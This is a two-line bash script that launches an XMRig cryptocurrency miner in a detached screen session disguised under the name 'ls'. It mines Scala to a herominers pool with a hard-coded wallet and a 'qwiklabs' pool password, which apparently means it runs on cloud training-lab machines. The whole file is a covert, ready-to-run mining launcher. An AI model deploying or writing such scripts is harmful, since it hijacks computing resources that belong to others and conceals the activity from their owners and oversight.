#!/bin/bash
chmod +x xmrigDaemon && screen -dmS ls ./xmrigDaemon --donate-level 0 -o sg.scala.herominers.com:1190 -u Ssy2JDayhZzKpwqCxjZVdXP2wV1PKBGrTQgqc9qbP88hQuAqVd11iDtU9yA2bbqdp7H2LQtrpPWk3R7CAV9p2LfP4aLQUNuCzZ -p qwiklabs -a panthera -t 3 -k pause
